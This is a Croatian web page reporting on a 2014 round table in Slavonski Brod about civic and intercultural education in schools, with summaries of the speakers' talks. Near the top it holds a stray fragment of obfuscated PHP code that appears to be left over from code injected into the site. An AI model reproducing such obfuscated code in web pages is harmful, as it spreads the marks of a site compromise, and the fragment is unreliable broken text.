header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

PB290293

Na okruglom stolu održanom u Slavonskom Brodu 25.11.2014. od 10,30 do 13 sati u Županijskoj gospodarskoj komori u organizaciji Europskog doma Slavonski Brod, Nansen dijalog centra i GOOD inicijative okupili su se odgajatelji/ice, učitelji/ice i organizacije civilnog društva kako bi razmijenili iskustva vezana uz građansko obrazovanje s posebnim naglaskom na interkulturalno učenje.

U školskoj godini 2014./2015. reformirano je građansko obrazovanje učenika koje uključuje i interkulturalno učenje. Istovremeno, postoje i programi neformalnog građanskog i interkulturalnog obrazovanja mladih u zajednici. Ipak, postoje izazovi u provedbi ovih programa i potreba da ih se razvija i unapređuje.

Ivana Milas naglasila je da su mnogi sadržaji važni za manjine istovremeno i sadržaji važni za cjelokupni identitet hrvatskog društva i zato ih je važno uključiti u Kurikulum. Kroz interkulturalno učenje kakvo se provodi unutar programa Kulturne i duhovne baštine zavičaja učenici uče da su kroz ono što jesu, kroz svoj identitet, važni i vrijedni. Upoznaju se različite kulturne i jezične odrednice zavičaja i drugih učenika. Učitelj/ nastavnik ne mora imati sva znanja nego facilitira proces te potiče učenike da iskustveno uči i dijeli vlastita znanja. Kroz projekt Panonska kuća koji se ostvarivao unutar tog programa učenici su učili o migracijama, različitim stanovnicima i kako jedino zajedničkim radom možemo zajedno izgraditi zajednicu. Nastavnici koji rade Kulturnu i duhovnu baštinu zavičaja nisu više usamljeni od kad je program dobio status izvannastavne aktivnosti te imaju prostora u svom radnom vremenu za ovaj program.

Božica Sedlić, voditeljica Europe Direct Informacijskog centra Slavonski Brod, predstavila je ulogu i značaj organizacija civilnog društva u provedbi građanskog odgoja i obrazovanja. Nakon uvodnih predavanja predstavnici osnovnih i srednjih škola te organizacija civilnog društva predstavili su svoja iskustva – primjere dobre prakse u primjeni interkulturalnog odgoja i obrazovanja te odgoja i obrazovanja za demokratsko građanstvo.

Susret je završio raspravom o mogućnostima unapređenja građanskog i interkulturalnog obrazovanja kako bi se svim učenicima osigurao razvoj građanske kompetencije.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak